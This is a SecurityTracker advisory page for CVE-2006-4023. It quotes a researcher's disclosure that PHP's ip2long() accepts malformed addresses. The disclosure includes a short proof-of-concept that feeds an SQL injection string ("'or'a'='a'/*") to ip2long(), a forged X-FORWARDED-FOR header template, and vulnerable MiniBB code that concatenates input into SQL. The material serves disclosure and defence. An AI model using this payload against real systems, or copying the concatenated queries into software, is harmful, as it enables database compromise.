SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP Error in ip2long() May Let Remote Users Inject SQL Commands Via Applications That Use the Function for Validation
SecurityTracker Alert ID:  1016609
SecurityTracker URL:  http://securitytracker.com/id/1016609
CVE Reference:   CVE-2006-4023   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jul 31 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 4.3.3, 5.0.2; possibly others
Description:   rgod reported a vulnerability in PHP in the ip2long() function. A remote user may be able to inject SQL commands via applications that use the function for validation prior to SQL queries.

The ip2long() function may incorrectly return a valid IPv4 network address when the ip address input value is not valid. If an application uses the function to determine whether a user-supplied IP address is valid or not before using the address in an SQL query, then SQL injection may be possible.

The specific impact depends on the application that uses the vulnerable function.

The original advisory is available at:

http://retrogod.altervista.org/php_ip2long.html

Impact:   In certain cases, a remote user may be able to inject SQL commands via an application that uses the ip2long() function for input validation purposes prior to an SQL query.

The specific impact depends on the application that uses the vulnerable function.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP ip2long() function circumvention

--- PHP ip2long() function circumvention --------------------------------------

tested on php 5.0.2
	   "  4.3.3
--------------------------------------------------------------------------------
after some test on miniBB application (http://www.minibb.net/) I obtained that
the php ip2long() function can be tricked to return a valid IPv4 Internet
network address instead of "-1" even if the ip address argument is not a valid
one, through the injection of some chars, ex:

<?php
 for ($i=0; $i<=255; $i++)
 {
  echo $i.":".ip2long("1.1.1.1".chr($i)."'or'a'='a'/*")."\r\n";
 }
?>

when chr($i) is chr(0), chr(9), chr(10), chr(11), chr(12), chr(13) or chr(32)

it gives the following (valid) result:

16843009

in minibb case this could result in sql injection, forging an header like this:

X-FOWARDED-FOR: 1.1.1.1[CHR(9)]'[SQL CODE]

or even like this:

X-FOWARDED-FOR: 1[CHR(9)]'[SQL CODE]

(however Minibb limit the string to 15 chars so you will have an unuseful twelve
chars sql injection...)
also remeber that HTTP headers is not filtered by PHP magic_quotes_gpc, so this
could give an attacker the way to fully compromise an application

code taken from MiniBB 2.0
index.php, 248-264
/* Banned IPs/IDs stuff */
$thisIp=getIP();                      <--------------------- here $thisIp becomes our sql code
$cen=explode('.', $thisIp);

if(isset($cen[0]) and isset($cen[1]) and isset($cen[2])){
$thisIpMask[0]=$cen[0].'.'.$cen[1].'.'.$cen[2].'.+';
$thisIpMask[1]=$cen[0].'.'.$cen[1].'.+';
}
else {
$thisIpMask[0]='0.0.0.+';
$thisIpMask[1]='0.0.0.+';
}

if (db_ipCheck($thisIp,$thisIpMask,$user_id)) { //<-----------  $thisIp is passed to the db_ipCheck() function
$title=$sitename." :: ".$l_accessDenied;
echo ParseTpl(makeUp('main_access_denied')); exit;
}

bb_functions.php, near lines 123-131
//--------------->
function getIP(){
$ip1=getenv('REMOTE_ADDR');$ip2=getenv('HTTP_X_FORWARDED_FOR');
if ($ip2!='' and ip2long($ip2)!=-1) $finalIP=$ip2; else $finalIP=$ip1; //<-- vulnerable code
$finalIP=substr($finalIP,0,15);
return $finalIP;
}

//--------------->

setup_mysql.php, near lines 99-105:

function db_ipCheck($thisIp,$thisIpMask,$user_id){
$res=mysql_query('select id from '.$GLOBALS['Tb'].' where
banip='."'".$thisIp."'".' or banip='."'".$thisIpMask[0]."'".' or //<--- sql injection
banip='."'".$thisIpMask[1]."'".' or banip='."'".$user_id."'");
echo mysql_error();
if($res and mysql_num_rows($res)>0) return TRUE; else return FALSE;
}

--------------------------------------------------------------------------------
1.05 29/07/2006
rgod
http://retrogod.altervista.org/php_ip2long.html
--------------------------------------------------------------------------------
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC